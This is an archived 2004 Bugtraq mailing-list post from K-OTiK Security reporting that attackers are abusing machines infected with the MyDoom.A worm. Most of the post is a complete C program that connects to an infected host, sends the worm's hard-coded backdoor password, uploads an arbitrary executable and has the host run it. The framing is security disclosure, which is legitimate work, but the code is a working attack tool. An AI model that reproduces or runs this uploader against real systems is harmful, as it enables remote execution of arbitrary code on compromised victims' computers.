MyDoom.A Machines : The new P2P Sharing Network ...

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MyDoom.A Machines : The new P2P Sharing Network ...
From: K-OTiK Security <Special-Alerts@xxxxxxxxxx>
Date: 10 Feb 2004 15:49:06 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


As you know MyDoom.A machines are exploited by MyDoom.C and Vesser - There is a 
faster and more dangerous worm exploiting these machines : his name is 
"kiddies" !!

so here is one of the codes used by hax0rz to exploit Mydoom.A machines (many 
other codes in the wild)

Regards.
Fabien // K-OTik Staff 
http://www.k-otik.com


// MyDoom.A Upload/Exec Backdoor
#include <stdio.h>
#include <string.h>
#include <winsock.h>

#pragma lib <ws2_32.lib>

int main(int argc,char *argv[]) {
 int sockfd, numbytes;
 
struct hostent *he;
struct sockaddr_in their_addr; 
char doompassword[] = "\x85\x13\x3c\x9e\xa2"; 
char buf[1024];
 int read=0;
FILE *fuckfile; 
 WSADATA wsaData; 

 if(argc<3)
 {
             printf("***************************************************\n");
     printf("***** MyDoom.A Upload/Exec Backdoor*****\n");
     printf("**** Usage: %s <ip> <port> <program to upload> ****\n", argv[0]);
             printf("***************************************************\n");
             return -1;
 }
 printf("[+] Opening File\n");

fuckfile = fopen(argv[3],"rb");
 if (fuckfile==NULL) {
 printf("[-] Open Failed\n");
 return -1;
 }
 printf("[+] File found ready to send\n");
 if(WSAStartup(0x101,&wsaData))
 {
printf("[-] Unable to load winsock.\n");
             return -1;
 }
 if ((he=gethostbyname(argv[1])) == NULL) {  // get the host info
         printf("[-] GetHostByName() Error!\n");
         return -1;
 }
 if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
         printf("[-] Can't open socket!\n");
         return -1;
 }
 their_addr.sin_family = AF_INET;    // host byte order
 their_addr.sin_port = htons(atoi(argv[2]));  // port
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);
 //memset(&(their_addr.sin_zero), '\0', 8);  // zero the rest of the struct
 if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == 
-1) {
         printf("[-] Connecting error\n");
         return -1;
 }
 printf("[+] Connected\n[+] Sending executable.\n");
 send(sockfd,doompassword,5,0); //sending the password :)
 while (!feof(fuckfile)) {
       read = fread(buf,sizeof(char),sizeof(buf),fuckfile);
       if ((numbytes=send(sockfd,buf,read,0)) == -1) {
          printf("[-] Sending executable failed\n");
          return -1;
       }
       printf(".");
 }
 printf("[+] All done, server have now executed your executable!\n");
 closesocket(sockfd);
 WSACleanup();
 return 0;
}

Follow-Ups:
- Re: MyDoom.A Machines : The new P2P Sharing Network ...
  - From: Nicolas Gregoire

Prev by Date: Another Low Blow From Microsoft: MBSA Failure!
Next by Date: RE: Another Low Blow From Microsoft: MBSA Failure!
Previous by thread: RE: Another Low Blow From Microsoft: MBSA Failure!
Next by thread: Re: MyDoom.A Machines : The new P2P Sharing Network ...
Index(es):
- Date
- Thread